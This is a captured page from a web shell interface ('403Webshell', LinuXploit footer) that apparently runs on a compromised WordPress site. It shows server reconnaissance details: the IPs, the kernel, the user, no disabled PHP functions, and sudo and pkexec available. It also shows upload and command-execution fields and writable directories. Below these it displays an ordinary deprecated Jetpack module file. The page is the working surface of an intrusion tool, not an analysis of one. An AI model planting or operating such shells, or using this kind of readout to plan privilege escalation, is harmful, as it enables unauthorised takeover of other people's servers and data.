403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.217.73
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/domains/licampfair.com/wp-content/plugins/jetpack/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/domains/licampfair.com/wp-content/plugins/jetpack/modules//minileven.php
<?php
/**
 * Deprecated since 8.3.0
 *
 * Originally we created the mobile theme feature as a fall-back
 * when the regular theme did not include a mobile view.
 * Most themes include a mobile view by default now, so the feature is no longer necessary.
 *
 * Visit this page for some alternatives:
 * https://jetpack.com/support/mobile-theme/
 *
 * If you MUST continue to use this module, you can use this standalone plugin as a temporary solution:
 * https://github.com/Automattic/minileven
 * However, we do not recommend it.
 *
 * @deprecated
 * @package automattic/jetpack
 */

/**
 * Deactivate module if it is still active.
 *
 * @since 8.3.0
 */
if ( Jetpack::is_module_active( 'minileven' ) ) {
	Jetpack::deactivate_module( 'minileven' );
}

// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
_deprecated_file( basename( __FILE__ ), 'jetpack-8.3.0' );

/**
 * Check if we are on mobile.
 */
function jetpack_check_mobile() {
	_deprecated_function( __FUNCTION__, 'jetpack-8.3.0', 'jetpack_is_mobile' );

	return jetpack_is_mobile();
}

/**
 * Should exclude from mobile?
 */
function jetpack_mobile_exclude() {
	_deprecated_function( __FUNCTION__, 'jetpack-8.3.0' );
}

/**
 * Setup function for the Mobile theme.
 * Can be overwritten in child themes.
 */
function minileven_setup() {
	_deprecated_function( __FUNCTION__, 'jetpack-8.3.0' );
}

Youez - 2016 - github.com/yon3zu
LinuXploit